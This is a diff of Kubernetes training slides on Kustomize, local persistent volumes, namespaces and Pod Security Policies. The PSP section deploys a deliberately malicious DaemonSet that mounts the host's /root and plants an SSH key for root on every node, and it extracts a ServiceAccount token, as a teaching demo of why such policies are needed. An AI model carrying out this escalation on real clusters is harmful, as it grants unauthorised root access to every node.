- is generally implemented with kube-proxy (or e.g. kube-router)
|
||||
|
||||
- Network policies:
|
||||
|
||||
- provide firewalling and isolation
|
||||
|
||||
- can be bundled with the "pod network" or provided by another component
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Even more moving parts
|
||||
|
||||
- Inbound traffic can be handled by multiple components:
|
||||
|
||||
- something like kube-proxy or kube-router (for NodePort services)
|
||||
|
||||
- load balancers (ideally, connected to the pod network)
|
||||
|
||||
- It is possible to use multiple pod networks in parallel
|
||||
|
||||
(with "meta-plugins" like CNI-Genie or Multus)
|
||||
|
||||
- Some solutions can fill multiple roles
|
||||
|
||||
(e.g. kube-router can be set up to provide the pod network and/or network policies and/or replace kube-proxy)
|
||||
|
||||
@@ -14,15 +14,15 @@
|
||||
|
||||
## Differences with Helm
|
||||
|
||||
- Helm Charts use placeholders `{{ like.this }}`
|
||||
- Helm charts use placeholders `{{ like.this }}`
|
||||
|
||||
- Kustomize "bases" are standard Kubernetes YAML
|
||||
|
||||
- It is possible to use an existing set of YAML as a Kustomize base
|
||||
|
||||
- As a result, writing a Helm Chart is more work ...
|
||||
- As a result, writing a Helm chart is more work ...
|
||||
|
||||
- ... But Helm Charts are also more powerful; e.g. they can:
|
||||
- ... But Helm charts are also more powerful; e.g. they can:
|
||||
|
||||
- use flags to conditionally include resources or blocks
|
||||
|
||||
@@ -88,11 +88,11 @@
|
||||
|
||||
- Change to a new directory:
|
||||
```bash
|
||||
mkdir ~/kubercoins
|
||||
cd ~/kubercoins
|
||||
mkdir ~/kustomcoins
|
||||
cd ~/kustomcoins
|
||||
```
|
||||
|
||||
- Run `ship init` with the kubercoins repository:
|
||||
- Run `ship init` with the kustomcoins repository:
|
||||
```bash
|
||||
ship init https://github.com/jpetazzo/kubercoins
|
||||
```
|
||||
@@ -146,3 +146,49 @@
|
||||
|
||||
- We will create a new copy of DockerCoins in another namespace
|
||||
|
||||
---
|
||||
|
||||
## Deploy DockerCoins with Kustomize
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a new namespace:
|
||||
```bash
|
||||
kubectl create namespace kustomcoins
|
||||
```
|
||||
|
||||
- Deploy DockerCoins:
|
||||
```bash
|
||||
kubectl apply -f rendered.yaml --namespace=kustomcoins
|
||||
```
|
||||
|
||||
- Or, with Kubernetes 1.14, you can also do this:
|
||||
```bash
|
||||
kubectl apply -k overlays/ship --namespace=kustomcoins
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Checking our new copy of DockerCoins
|
||||
|
||||
- We can check the worker logs, or the web UI
|
||||
|
||||
.exercise[
|
||||
|
||||
- Retrieve the NodePort number of the web UI:
|
||||
```bash
|
||||
kubectl get service webui --namespace=kustomcoins
|
||||
```
|
||||
|
||||
- Open it in a web browser
|
||||
|
||||
- Look at the worker logs:
|
||||
```bash
|
||||
kubectl logs deploy/worker --tail=10 --follow --namespace=kustomcoins
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
Note: it might take a minute or two for the worker to start.
|
||||
|
||||
@@ -120,7 +120,7 @@
|
||||
|
||||
- Team "build" ships ready-to-run manifests
|
||||
|
||||
(YAML, Helm Charts, Kustomize ...)
|
||||
(YAML, Helm charts, Kustomize ...)
|
||||
|
||||
- Team "run" adjusts some parameters and monitors the application
|
||||
|
||||
|
||||
244
slides/k8s/local-persistent-volumes.md
Normal file
244
slides/k8s/local-persistent-volumes.md
Normal file
@@ -0,0 +1,244 @@
|
||||
# Local Persistent Volumes
|
||||
|
||||
- We want to run that Consul cluster *and* actually persist data
|
||||
|
||||
- But we don't have a distributed storage system
|
||||
|
||||
- We are going to use local volumes instead
|
||||
|
||||
(similar conceptually to `hostPath` volumes)
|
||||
|
||||
- We can use local volumes without installing extra plugins
|
||||
|
||||
- However, they are tied to a node
|
||||
|
||||
- If that node goes down, the volume becomes unavailable
|
||||
|
||||
---
|
||||
|
||||
## With or without dynamic provisioning
|
||||
|
||||
- We will deploy a Consul cluster *with* persistence
|
||||
|
||||
- That cluster's StatefulSet will create PVCs
|
||||
|
||||
- These PVCs will remain unbound¹, until we will create local volumes manually
|
||||
|
||||
(we will basically do the job of the dynamic provisioner)
|
||||
|
||||
- Then, we will see how to automate that with a dynamic provisioner
|
||||
|
||||
.footnote[¹Unbound = without an associated Persistent Volume.]
|
||||
|
||||
---
|
||||
|
||||
## Work in a separate namespace
|
||||
|
||||
- To avoid conflicts with existing resources, let's create and use a new namespace
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a new namespace:
|
||||
```bash
|
||||
kubectl create namespace orange
|
||||
```
|
||||
|
||||
- Switch to that namespace:
|
||||
```bash
|
||||
kns orange
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
.warning[Make sure to call that namespace `orange`, because that name is hardcoded in the YAML files.]
|
||||
|
||||
---
|
||||
|
||||
## Deploying Consul
|
||||
|
||||
- We will use a slightly different YAML file
|
||||
|
||||
- The only differences between that file and the previous one are:
|
||||
|
||||
- `volumeClaimTemplate` defined in the Stateful Set spec
|
||||
|
||||
- the corresponding `volumeMounts` in the Pod spec
|
||||
|
||||
- the namespace `orange` used for discovery of Pods
|
||||
|
||||
.exercise[
|
||||
|
||||
- Apply the persistent Consul YAML file:
|
||||
```bash
|
||||
kubectl apply -f ~/container.training/k8s/persistent-consul.yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Observing the situation
|
||||
|
||||
- Let's look at Persistent Volume Claims and Pods
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check that we now have an unbound Persistent Volume Claim:
|
||||
```bash
|
||||
kubectl get pvc
|
||||
```
|
||||
|
||||
- We don't have any Persistent Volume:
|
||||
```bash
|
||||
kubectl get pv
|
||||
```
|
||||
|
||||
- The Pod `consul-0` is not scheduled yet:
|
||||
```bash
|
||||
kubectl get pods -o wide
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
*Hint: leave these commands running with `-w` in different windows.*
|
||||
|
||||
---
|
||||
|
||||
## Explanations
|
||||
|
||||
- In a Stateful Set, the Pods are started one by one
|
||||
|
||||
- `consul-1` won't be created until `consul-0` is running
|
||||
|
||||
- `consul-0` has a dependency on an unbound Persistent Volume Claim
|
||||
|
||||
- The scheduler won't schedule the Pod until the PVC is bound
|
||||
|
||||
(because the PVC might be bound to a volume that is only available on a subset of nodes; for instance EBS are tied to an availability zone)
|
||||
|
||||
---
|
||||
|
||||
## Creating Persistent Volumes
|
||||
|
||||
- Let's create 3 local directories (`/mnt/consul`) on node2, node3, node4
|
||||
|
||||
- Then create 3 Persistent Volumes corresponding to these directories
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the local directories:
|
||||
```bash
|
||||
for NODE in node2 node3 node4; do
|
||||
ssh $NODE sudo mkdir -p /mnt/consul
|
||||
done
|
||||
```
|
||||
|
||||
- Create the PV objects:
|
||||
```bash
|
||||
kubectl apply -f ~/container.training/k8s/volumes-for-consul.yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Check our Consul cluster
|
||||
|
||||
- The PVs that we created will be automatically matched with the PVCs
|
||||
|
||||
- Once a PVC is bound, its pod can start normally
|
||||
|
||||
- Once the pod `consul-0` has started, `consul-1` can be created, etc.
|
||||
|
||||
- Eventually, our Consul cluster is up, and backend by "persistent" volumes
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check that our Consul clusters has 3 members indeed:
|
||||
```bash
|
||||
kubectl exec consul-0 consul members
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Devil is in the details (1/2)
|
||||
|
||||
- The size of the Persistent Volumes is bogus
|
||||
|
||||
(it is used when matching PVs and PVCs together, but there is no actual quota or limit)
|
||||
|
||||
---
|
||||
|
||||
## Devil is in the details (2/2)
|
||||
|
||||
- This specific example worked because we had exactly 1 free PV per node:
|
||||
|
||||
- if we had created multiple PVs per node ...
|
||||
|
||||
- we could have ended with two PVCs bound to PVs on the same node ...
|
||||
|
||||
- which would have required two pods to be on the same node ...
|
||||
|
||||
- which is forbidden by the anti-affinity constraints in the StatefulSet
|
||||
|
||||
- To avoid that, we need to associated the PVs with a Storage Class that has:
|
||||
```yaml
|
||||
volumeBindingMode: WaitForFirstConsumer
|
||||
```
|
||||
(this means that a PVC will be bound to a PV only after being used by a Pod)
|
||||
|
||||
- See [this blog post](https://kubernetes.io/blog/2018/04/13/local-persistent-volumes-beta/) for more details
|
||||
|
||||
---
|
||||
|
||||
## Bulk provisioning
|
||||
|
||||
- It's not practical to manually create directories and PVs for each app
|
||||
|
||||
- We *could* pre-provision a number of PVs across our fleet
|
||||
|
||||
- We could even automate that with a Daemon Set:
|
||||
|
||||
- creating a number of directories on each node
|
||||
|
||||
- creating the corresponding PV objects
|
||||
|
||||
- We also need to recycle volumes
|
||||
|
||||
- ... This can quickly get out of hand
|
||||
|
||||
---
|
||||
|
||||
## Dynamic provisioning
|
||||
|
||||
- We could also write our own provisioner, which would:
|
||||
|
||||
- watch the PVCs across all namespaces
|
||||
|
||||
- when a PVC is created, create a corresponding PV on a node
|
||||
|
||||
- Or we could use one of the dynamic provisioners for local persistent volumes
|
||||
|
||||
(for instance the [Rancher local path provisioner](https://github.com/rancher/local-path-provisioner))
|
||||
|
||||
---
|
||||
|
||||
## Strategies for local persistent volumes
|
||||
|
||||
- Remember, when a node goes down, the volumes on that node become unavailable
|
||||
|
||||
- High availability will require another layer of replication
|
||||
|
||||
(like what we've just seen with Consul; or primary/secondary; etc)
|
||||
|
||||
- Pre-provisioning PVs makes sense for machines with local storage
|
||||
|
||||
(e.g. cloud instance storage; or storage directly attached to a physical machine)
|
||||
|
||||
- Dynamic provisioning makes sense for large number of applications
|
||||
|
||||
(when we can't or won't dedicate a whole disk to a volume)
|
||||
|
||||
- It's possible to mix both (using distinct Storage Classes)
|
||||
@@ -6,6 +6,24 @@
|
||||
|
||||
---
|
||||
|
||||
## Requirements
|
||||
|
||||
.warning[The exercises in this chapter should be done *on your local machine*.]
|
||||
|
||||
- `kubectl` is officially available on Linux, macOS, Windows
|
||||
|
||||
(and unofficially anywhere we can build and run Go binaries)
|
||||
|
||||
- You may skip these exercises if you are following along from:
|
||||
|
||||
- a tablet or phone
|
||||
|
||||
- a web-based terminal
|
||||
|
||||
- an environment where you can't install and run new binaries
|
||||
|
||||
---
|
||||
|
||||
## Installing `kubectl`
|
||||
|
||||
- If you already have `kubectl` on your local machine, you can skip this
|
||||
@@ -16,11 +34,11 @@
|
||||
|
||||
- Download the `kubectl` binary from one of these links:
|
||||
|
||||
[Linux](https://storage.googleapis.com/kubernetes-release/release/v1.14.1/bin/linux/amd64/kubectl)
|
||||
[Linux](https://storage.googleapis.com/kubernetes-release/release/v1.14.2/bin/linux/amd64/kubectl)
|
||||
|
|
||||
[macOS](https://storage.googleapis.com/kubernetes-release/release/v1.14.1/bin/darwin/amd64/kubectl)
|
||||
[macOS](https://storage.googleapis.com/kubernetes-release/release/v1.14.2/bin/darwin/amd64/kubectl)
|
||||
|
|
||||
[Windows](https://storage.googleapis.com/kubernetes-release/release/v1.14.1/bin/windows/amd64/kubectl.exe)
|
||||
[Windows](https://storage.googleapis.com/kubernetes-release/release/v1.14.2/bin/windows/amd64/kubectl.exe)
|
||||
|
||||
- On Linux and macOS, make the binary executable with `chmod +x kubectl`
|
||||
|
||||
@@ -65,9 +83,16 @@ Platform:"linux/amd64"}
|
||||
|
||||
- If you never used `kubectl` on your machine before: nothing to do!
|
||||
|
||||
- If you already used `kubectl` to control a Kubernetes cluster before:
|
||||
.exercise[
|
||||
|
||||
- rename `~/.kube/config` to e.g. `~/.kube/config.bak`
|
||||
- Make a copy of `~/.kube/config`; if you are using macOS or Linux, you can do:
|
||||
```bash
|
||||
cp ~/.kube/config ~/.kube/config.before.training
|
||||
```
|
||||
|
||||
- If you are using Windows, you will need to adapt this command
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -1,26 +1,65 @@
|
||||
# Namespaces
|
||||
|
||||
- We would like to deploy another copy of DockerCoins on our cluster
|
||||
|
||||
- We could rename all our deployments and services:
|
||||
|
||||
hasher → hasher2, redis → redis2, rng → rng2, etc.
|
||||
|
||||
- That would require updating the code
|
||||
|
||||
- There as to be a better way!
|
||||
|
||||
--
|
||||
|
||||
- As hinted by the title of this section, we will use *namespaces*
|
||||
|
||||
---
|
||||
|
||||
## Identifying a resource
|
||||
|
||||
- We cannot have two resources with the same name
|
||||
|
||||
(Or can we...?)
|
||||
(or can we...?)
|
||||
|
||||
--
|
||||
|
||||
- We cannot have two resources *of the same type* with the same name
|
||||
- We cannot have two resources *of the same kind* with the same name
|
||||
|
||||
(But it's OK to have a `rng` service, a `rng` deployment, and a `rng` daemon set!)
|
||||
(but it's OK to have a `rng` service, a `rng` deployment, and a `rng` daemon set)
|
||||
|
||||
--
|
||||
|
||||
- We cannot have two resources of the same type with the same name *in the same namespace*
|
||||
- We cannot have two resources of the same kind with the same name *in the same namespace*
|
||||
|
||||
(But it's OK to have e.g. two `rng` services in different namespaces!)
|
||||
(but it's OK to have e.g. two `rng` services in different namespaces)
|
||||
|
||||
--
|
||||
|
||||
- In other words: **the tuple *(type, name, namespace)* needs to be unique**
|
||||
- Except for resources that exist at the *cluster scope*
|
||||
|
||||
(In the resource YAML, the type is called `Kind`)
|
||||
(these do not belong to a namespace)
|
||||
|
||||
---
|
||||
|
||||
## Uniquely identifying a resource
|
||||
|
||||
- For *namespaced* resources:
|
||||
|
||||
the tuple *(kind, name, namespace)* needs to be unique
|
||||
|
||||
- For resources at the *cluster scope*:
|
||||
|
||||
the tuple *(kind, name)* needs to be unique
|
||||
|
||||
.exercise[
|
||||
|
||||
- List resource types again, and check the NAMESPACED column:
|
||||
```bash
|
||||
kubectl api-resources
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
@@ -59,7 +98,7 @@
|
||||
|
||||
- The two methods above are identical
|
||||
|
||||
- If we are using a tool like Helm, it will create namespaces automatically
|
||||
- Some tools like Helm will create namespaces automatically when needed
|
||||
|
||||
---
|
||||
|
||||
@@ -168,41 +207,27 @@
|
||||
|
||||
---
|
||||
|
||||
## Deploy DockerCoins with Helm
|
||||
## Deploying DockerCoins with YAML files
|
||||
|
||||
*Follow these instructions if you previously created a Helm Chart.*
|
||||
- The GitHub repository `jpetazzo/kubercoins` contains everything we need!
|
||||
|
||||
.exercise[
|
||||
|
||||
- Deploy DockerCoins:
|
||||
- Clone the kubercoins repository:
|
||||
```bash
|
||||
helm install dockercoins
|
||||
git clone https://github.com/jpetazzo/kubercoins
|
||||
```
|
||||
|
||||
- Create all the DockerCoins resources:
|
||||
```bash
|
||||
kubectl create -f kubercoins
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
In the last command line, `dockercoins` is just the local path where
|
||||
we created our Helm chart before.
|
||||
If the argument behind `-f` is a directory, all the files in that directory are processed.
|
||||
|
||||
---
|
||||
|
||||
## Deploy DockerCoins with Kustomize
|
||||
|
||||
*Follow these instructions if you previously created a Kustomize overlay.*
|
||||
|
||||
.exercise[
|
||||
|
||||
- Deploy DockerCoins:
|
||||
```bash
|
||||
kubectl apply -f rendered.yaml
|
||||
```
|
||||
|
||||
- Or, with Kubernetes 1.14, you can also do this:
|
||||
```bash
|
||||
kubectl apply -k overlays/ship
|
||||
```
|
||||
|
||||
]
|
||||
The subdirectories are *not* processed, unless we also add the `-R` flag.
|
||||
|
||||
---
|
||||
|
||||
@@ -221,46 +246,7 @@ we created our Helm chart before.
|
||||
|
||||
]
|
||||
|
||||
If the graph shows up but stays at zero, check the next slide!
|
||||
|
||||
---
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
If did the exercices from the chapter about labels and selectors,
|
||||
the app that you just created may not work, because the `rng` service
|
||||
selector has `enabled=yes` but the pods created by the `rng` daemon set
|
||||
do not have that label.
|
||||
|
||||
How can we troubleshoot that?
|
||||
|
||||
- Query individual services manually
|
||||
|
||||
→ the `rng` service will time out
|
||||
|
||||
- Inspect the services with `kubectl describe service`
|
||||
|
||||
→ the `rng` service will have an empty list of backends
|
||||
|
||||
---
|
||||
|
||||
## Fixing the broken service
|
||||
|
||||
The easiest option is to add the `enabled=yes` label to the relevant pods.
|
||||
|
||||
.exercise[
|
||||
|
||||
- Add the `enabled` label to the pods of the `rng` daemon set:
|
||||
```bash
|
||||
kubectl label pods -l app=rng enabled=yes
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The *best* option is to change either the service definition, or the
|
||||
daemon set definition, so that their respective selectors match correctly.
|
||||
|
||||
*This is left as an exercise for the reader!*
|
||||
If the graph shows up but stays at zero, give it a minute or two!
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -11,6 +11,7 @@
|
||||
|
||||
- Deploy everything else:
|
||||
```bash
|
||||
set -u
|
||||
for SERVICE in hasher rng webui worker; do
|
||||
kubectl create deployment $SERVICE --image=$REGISTRY/$SERVICE:$TAG
|
||||
done
|
||||
|
||||
601
slides/k8s/podsecuritypolicy.md
Normal file
601
slides/k8s/podsecuritypolicy.md
Normal file
@@ -0,0 +1,601 @@
|
||||
# Pod Security Policies
|
||||
|
||||
- By default, our pods and containers can do *everything*
|
||||
|
||||
(including taking over the entire cluster)
|
||||
|
||||
- We are going to show an example of a malicious pod
|
||||
|
||||
- Then we will explain how to avoid this with PodSecurityPolicies
|
||||
|
||||
- We will illustrate this by creating a non-privileged user limited to a namespace
|
||||
|
||||
---
|
||||
|
||||
## Setting up a namespace
|
||||
|
||||
- Let's create a new namespace called "green"
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the "green" namespace:
|
||||
```bash
|
||||
kubectl create namespace green
|
||||
```
|
||||
|
||||
- Change to that namespace:
|
||||
```bash
|
||||
kns green
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Using limited credentials
|
||||
|
||||
- When a namespace is created, a `default` ServiceAccount is added
|
||||
|
||||
- By default, this ServiceAccount doesn't have any access rights
|
||||
|
||||
- We will use this ServiceAccount as our non-privileged user
|
||||
|
||||
- We will obtain this ServiceAccount's token and add it to a context
|
||||
|
||||
- Then we will give basic access rights to this ServiceAccount
|
||||
|
||||
---
|
||||
|
||||
## Obtaining the ServiceAccount's token
|
||||
|
||||
- The token is stored in a Secret
|
||||
|
||||
- The Secret is listed in the ServiceAccount
|
||||
|
||||
.exercise[
|
||||
|
||||
- Obtain the name of the Secret from the ServiceAccount::
|
||||
```bash
|
||||
SECRET=$(kubectl get sa default -o jsonpath={.secrets[0].name})
|
||||
```
|
||||
|
||||
- Extract the token from the Secret object:
|
||||
```bash
|
||||
TOKEN=$(kubectl get secrets $SECRET -o jsonpath={.data.token}
|
||||
| base64 -d)
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Inspecting a Kubernetes token
|
||||
|
||||
- Kubernetes tokens are JSON Web Tokens
|
||||
|
||||
(as defined by [RFC 7519](https://tools.ietf.org/html/rfc7519))
|
||||
|
||||
- We can view their content (and even verify them) easily
|
||||
|
||||
.exercise[
|
||||
|
||||
- Display the token that we obtained:
|
||||
```bash
|
||||
echo $TOKEN
|
||||
```
|
||||
|
||||
- Copy paste the token in the verification form on https://jwt.io
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Authenticating using the ServiceAccount token
|
||||
|
||||
- Let's create a new *context* accessing our cluster with that token
|
||||
|
||||
.exercise[
|
||||
|
||||
- First, add the token credentials to our kubeconfig file:
|
||||
```bash
|
||||
kubectl config set-credentials green --token=$TOKEN
|
||||
```
|
||||
|
||||
- Then, create a new context using these credentials:
|
||||
```bash
|
||||
kubectl config set-context green --user=green --cluster=kubernetes
|
||||
```
|
||||
|
||||
- Check the results:
|
||||
```bash
|
||||
kubectl config get-contexts
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Using the new context
|
||||
|
||||
- Normally, this context doesn't let us access *anything* (yet)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Change to the new context with one of these two commands:
|
||||
```bash
|
||||
kctx green
|
||||
kubectl config use-context green
|
||||
```
|
||||
|
||||
- Also change to the green namespace in that context:
|
||||
```bash
|
||||
kns green
|
||||
```
|
||||
|
||||
- Confirm that we don't have access to anything:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Giving basic access rights
|
||||
|
||||
- Let's bind the ClusterRole `edit` to our ServiceAccount
|
||||
|
||||
- To allow access only to the namespace, we use a RoleBinding
|
||||
|
||||
(instead of a ClusterRoleBinding, which would give global access)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Switch back to `cluster-admin`:
|
||||
```bash
|
||||
kctx -
|
||||
```
|
||||
|
||||
- Create the Role Binding:
|
||||
```bash
|
||||
kubectl create rolebinding green --clusterrole=edit --serviceaccount=green:default
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Verifying access rights
|
||||
|
||||
- Let's switch back to the `green` context and check that we have rights
|
||||
|
||||
.exercise[
|
||||
|
||||
- Switch back to `green`:
|
||||
```bash
|
||||
kctx green
|
||||
```
|
||||
|
||||
- Check our permissions:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
We should see an empty list.
|
||||
|
||||
(Better than a series of permission errors!)
|
||||
|
||||
---
|
||||
|
||||
## Creating a basic Deployment
|
||||
|
||||
- Just to demonstrate that everything works correctly, deploy NGINX
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a Deployment using the official NGINX image:
|
||||
```bash
|
||||
kubectl create deployment web --image=nginx
|
||||
```
|
||||
|
||||
- Confirm that the Deployment, ReplicaSet, and Pod exist, and Pod is running:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## One example of malicious pods
|
||||
|
||||
- We will now show an escalation technique in action
|
||||
|
||||
- We will deploy a DaemonSet that adds our SSH key to the root account
|
||||
|
||||
(on *each* node of the cluster)
|
||||
|
||||
- The Pods of the DaemonSet will do so by mounting `/root` from the host
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check the file `k8s/hacktheplanet.yaml` with a text editor:
|
||||
```bash
|
||||
vim ~/container.training/k8s/hacktheplanet.yaml
|
||||
```
|
||||
|
||||
- If you would like, change the SSH key (by changing the GitHub user name)
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Deploying the malicious pods
|
||||
|
||||
- Let's deploy our "exploit"!
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the DaemonSet:
|
||||
```bash
|
||||
kubectl create -f ~/container.training/k8s/hacktheplanet.yaml
|
||||
```
|
||||
|
||||
- Check that the pods are running:
|
||||
```bash
|
||||
kubectl get pods
|
||||
```
|
||||
|
||||
- Confirm that the SSH key was added to the node's root account:
|
||||
```bash
|
||||
sudo cat /root/.ssh/authorized_keys
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Cleaning up
|
||||
|
||||
- Before setting up our PodSecurityPolicies, clean up that namespace
|
||||
|
||||
.exercise[
|
||||
|
||||
- Remove the DaemonSet:
|
||||
```bash
|
||||
kubectl delete daemonset hacktheplanet
|
||||
```
|
||||
|
||||
- Remove the Deployment:
|
||||
```bash
|
||||
kubectl delete deployment web
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Pod Security Policies in theory
|
||||
|
||||
- To use PSPs, we need to activate their specific *admission controller*
|
||||
|
||||
- That admission controller will intercept each pod creation attempt
|
||||
|
||||
- It will look at:
|
||||
|
||||
- *who/what* is creating the pod
|
||||
|
||||
- which PodSecurityPolicies they can use
|
||||
|
||||
- which PodSecurityPolicies can be used by the Pod's ServiceAccount
|
||||
|
||||
- Then it will compare the Pod with each PodSecurityPolicy one by one
|
||||
|
||||
- If a PodSecurityPolicy accepts all the parameters of the Pod, it is created
|
||||
|
||||
- Otherwise, the Pod creation is denied and it won't even show up in `kubectl get pods`
|
||||
|
||||
---
|
||||
|
||||
## Pod Security Policies fine print
|
||||
|
||||
- With RBAC, using a PSP corresponds to the verb `use` on the PSP
|
||||
|
||||
(that makes sense, right?)
|
||||
|
||||
- If no PSP is defined, no Pod can be created
|
||||
|
||||
(even by cluster admins)
|
||||
|
||||
- Pods that are already running are *not* affected
|
||||
|
||||
- If we create a Pod directly, it can use a PSP to which *we* have access
|
||||
|
||||
- If the Pod is created by e.g. a ReplicaSet or DaemonSet, it's different:
|
||||
|
||||
- the ReplicaSet / DaemonSet controllers don't have access to *our* policies
|
||||
|
||||
- therefore, we need to give access to the PSP to the Pod's ServiceAccount
|
||||
|
||||
---
|
||||
|
||||
## Pod Security Policies in practice
|
||||
|
||||
- We are going to enable the PodSecurityPolicy admission controller
|
||||
|
||||
- At that point, we won't be able to create any more pods (!)
|
||||
|
||||
- Then we will create a couple of PodSecurityPolicies
|
||||
|
||||
- ... And associated ClusterRoles (giving `use` access to the policies)
|
||||
|
||||
- Then we will create RoleBindings to grant these roles to ServiceAccounts
|
||||
|
||||
- We will verify that we can't run our "exploit" anymore
|
||||
|
||||
---
|
||||
|
||||
## Enabling Pod Security Policies
|
||||
|
||||
- To enable Pod Security Policies, we need to enable their *admission plugin*
|
||||
|
||||
- This is done by adding a flag to the API server
|
||||
|
||||
- On clusters deployed with `kubeadm`, the control plane runs in static pods
|
||||
|
||||
- These pods are defined in YAML files located in `/etc/kubernetes/manifests`
|
||||
|
||||
- Kubelet watches this directory
|
||||
|
||||
- Each time a file is added/removed there, kubelet creates/deletes the corresponding pod
|
||||
|
||||
- Updating a file causes the pod to be deleted and recreated
|
||||
|
||||
---
|
||||
|
||||
## Updating the API server flags
|
||||
|
||||
- Let's edit the manifest for the API server pod
|
||||
|
||||
.exercise[
|
||||
|
||||
- Have a look at the static pods:
|
||||
```bash
|
||||
ls -l /etc/kubernetes/manifest
|
||||
```
|
||||
|
||||
- Edit the one corresponding to the API server:
|
||||
```bash
|
||||
sudo vim /etc/kubernetes/manifests/kube-apiserver.yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Adding the PSP admission plugin
|
||||
|
||||
- There should already be a line with `--enable-admission-plugins=...`
|
||||
|
||||
- Let's add `PodSecurityPolicy` on that line
|
||||
|
||||
.exercise[
|
||||
|
||||
- Locate the line with `--enable-admission-plugins=`
|
||||
|
||||
- Add `PodSecurityPolicy`
|
||||
|
||||
(It should read `--enable-admission-plugins=NodeRestriction,PodSecurityPolicy`)
|
||||
|
||||
- Save, quit
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Waiting for the API server to restart
|
||||
|
||||
- The kubelet detects that the file was modified
|
||||
|
||||
- It kills the API server pod, and starts a new one
|
||||
|
||||
- During that time, the API server is unavailable
|
||||
|
||||
.exercise[
|
||||
|
||||
- Wait until the API server is available again
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Check that the admission plugin is active
|
||||
|
||||
- Normally, we can't create any Pod at this point
|
||||
|
||||
.exercise[
|
||||
|
||||
- Try to create a Pod directly:
|
||||
```bash
|
||||
kubectl run testpsp1 --image=nginx --restart=Never
|
||||
```
|
||||
|
||||
- Try to create a Deployment:
|
||||
```bash
|
||||
kubectl run testpsp2 --image=nginx
|
||||
```
|
||||
|
||||
- Look at existing resources:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
We can get hints at what's happening by looking at the ReplicaSet and Events.
|
||||
|
||||
---
|
||||
|
||||
## Introducing our Pod Security Policies
|
||||
|
||||
- We will create two policies:
|
||||
|
||||
- privileged (allows everything)
|
||||
|
||||
- restricted (blocks some unsafe mechanisms)
|
||||
|
||||
- For each policy, we also need an associated ClusterRole granting *use*
|
||||
|
||||
---
|
||||
|
||||
## Creating our Pod Security Policies
|
||||
|
||||
- We have a couple of files, each defining a PSP and associated ClusterRole:
|
||||
|
||||
- k8s/psp-privileged.yaml: policy `privileged`, role `psp:privileged`
|
||||
- k8s/psp-restricted.yaml: policy `restricted`, role `psp:restricted`
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create both policies and their associated ClusterRoles:
|
||||
```bash
|
||||
kubectl create -f ~/container.training/k8s/psp-restricted.yaml
|
||||
kubectl create -f ~/container.training/k8s/psp-privileged.yaml
|
||||
```
|
||||
]
|
||||
|
||||
- The privileged policy comes from [the Kubernetes documentation](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#example-policies)
|
||||
|
||||
- The restricted policy is inspired by that same documentation page
|
||||
|
||||
---
|
||||
|
||||
## Binding the restricted policy
|
||||
|
||||
- Let's bind the role `psp:restricted` to ServiceAccount `green:default`
|
||||
|
||||
(aka the default ServiceAccount in the green Namespace)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the following RoleBinding:
|
||||
```bash
|
||||
kubectl create rolebinding psp:restricted \
|
||||
--clusterrole=psp:restricted \
|
||||
--serviceaccount=green:default
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Trying it out
|
||||
|
||||
- Let's switch to the `green` context, and try to create resources
|
||||
|
||||
.exercise[
|
||||
|
||||
- Switch to the `green` context:
|
||||
```bash
|
||||
kctx green
|
||||
```
|
||||
|
||||
- Create a simple Deployment:
|
||||
```bash
|
||||
kubectl create deployment web --image=nginx
|
||||
```
|
||||
|
||||
- Look at the Pods that have been created:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Trying to hack the cluster
|
||||
|
||||
